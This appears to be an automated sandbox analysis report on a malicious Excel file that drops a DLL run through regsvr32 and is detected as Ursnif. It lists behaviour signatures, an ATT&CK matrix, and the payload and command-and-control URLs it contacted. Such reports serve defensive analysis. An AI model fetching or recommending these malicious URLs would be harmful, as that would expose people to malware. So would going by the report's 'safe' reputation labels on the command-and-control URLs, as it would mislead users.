                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872Thread sleep count: 203 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress,1_2_66DB1F31
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFBFB5 mov eax, dword ptr fs:[00000030h]1_2_66DFBFB5
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFBAF2 push dword ptr fs:[00000030h]1_2_66DFBAF2
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DFBEEB mov eax, dword ptr fs:[00000030h]1_2_66DFBEEB
                Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_66DB1566
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_66DF5C41
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_66DEF574
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,1_2_66DED27D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,1_2_66DEFBE2
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,1_2_66DF0133
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB1979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_66DB1979
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_66DB146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_66DB146C
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection2Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting2Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsExploitation for Client Execution4Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSVirtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Information Discovery25Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 403127 Sample: 6613n246zm543w.xlsb Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 Document exploit detected (drops PE files) 2->49 51 8 other signatures 2->51 6 EXCEL.EXE 37 48 2->6         started        11 iexplore.exe 1 72 2->11         started        13 iexplore.exe 1 50 2->13         started        15 iexplore.exe 1 50 2->15         started        process3 dnsIp4 39 docs.atu.ngr.mybluehost.me 162.241.24.47, 49740, 80 UNIFIEDLAYER-AS-1US United States 6->39 27 C:\Users\user\AppData\...\presentation[1].dll, PE32 6->27 dropped 29 C:\Users\Public\block.dll, PE32 6->29 dropped 31 C:\Users\user\Desktop\~$6613n246zm543w.xlsb, data 6->31 dropped 53 Document exploit detected (creates forbidden files) 6->53 55 Document exploit detected (UrlDownloadToFile) 6->55 17 regsvr32.exe 6->17         started        20 iexplore.exe 37 11->20         started        23 iexplore.exe 35 13->23         started        25 iexplore.exe 35 15->25         started        file5 signatures6 process7 dnsIp8 41 Writes or reads registry keys via WMI 17->41 43 Writes registry values via WMI 17->43 33 app.buboleinov.com 34.86.224.8, 49764, 49765, 49779 GOOGLEUS United States 20->33 35 chat.billionady.com 23->35 37 app3.maintorna.com 25->37 signatures9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\block.dll13%ReversingLabsWin32.Worm.Cridex
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll13%ReversingLabsWin32.Worm.Cridex

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                1.2.regsvr32.exe.27f0000.1.unpack100%AviraHEUR/AGEN.1108168Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK0%Avira URL Cloudsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
                http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm0%Avira URL Cloudsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0%Avira URL Cloudsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg0%Avira URL Cloudsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s0%Avira URL Cloudsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://ncus.contentsync.0%URL Reputationsafe
                https://ncus.contentsync.0%URL Reputationsafe
                https://ncus.contentsync.0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
                https://wus2.contentsync.0%URL Reputationsafe
                https://wus2.contentsync.0%URL Reputationsafe
                https://wus2.contentsync.0%URL Reputationsafe
                http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/0%Avira URL Cloudsafe
                https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
                https://ncus.pagecontentsync.0%URL Reputationsafe
                https://ncus.pagecontentsync.0%URL Reputationsafe
                https://ncus.pagecontentsync.0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                app3.maintorna.com
                		34.86.224.8
                		truefalse
                  		unknown
                  chat.billionady.com
                  		34.86.224.8
                  		truefalse
                    		unknown
                    app.buboleinov.com
                    		34.86.224.8
                    		truefalse
                      		unknown
                      docs.atu.ngr.mybluehost.me
                      		162.241.24.47
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://docs.atu.ngr.mybluehost.me/presentation.dllfalse
                          		high
                          http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fmfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJgfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/sfalse
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.diagnosticssdf.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                            		high
                            https://login.microsoftonline.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                              		high
                              https://shell.suite.office.com:144351B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                		high
                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                  		high
                                  https://autodiscover-s.outlook.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                      		high
                                      https://cdn.entity.51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.addins.omex.office.net/appinfo/query51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                        		high
                                        https://clients.config.office.net/user/v1.0/tenantassociationkey51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                          		high
                                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            		high
                                            http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK{FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://powerlift.acompli.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://rpsticket.partnerservices.getmicrosoftkey.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://lookup.onenote.com/lookup/geolocation/v151B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                              		high
                                              https://cortana.ai51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                		high
                                                https://cloudfiles.onenote.com/upload.aspx51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                  		high
                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                    		high
                                                    https://entitlement.diagnosticssdf.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                      		high
                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        		high
                                                        https://api.aadrm.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://ofcrecsvcapi-int.azurewebsites.net/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                          		high
                                                          https://api.microsoftstream.com/api/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                            		high
                                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                              		high
                                                              https://cr.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                		high
                                                                https://portal.office.com/account/?ref=ClientMeControl51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                  		high
                                                                  http://www.reddit.com/msapplication.xml4.18.drfalse
                                                                    		high
                                                                    https://ecs.office.com/config/v2/Office51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                      		high
                                                                      https://graph.ppe.windows.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        		high
                                                                        https://res.getmicrosoftkey.com/api/redemptionevents51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://powerlift-frontdesk.acompli.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://tasks.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                          		high
                                                                          https://officeci.azurewebsites.net/api/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://sr.outlook.office.net/ws/speech/recognize/assistant/work51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                            		high
                                                                            http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf{E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://store.office.cn/addinstemplate51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://outlook.office.com/autosuggest/api/v1/init?cvid=51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                              		high
                                                                              https://globaldisco.crm.dynamics.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                		high
                                                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                  		high
                                                                                  https://store.officeppe.com/addinstemplate51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://dev0-api.acompli.net/autodetect51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
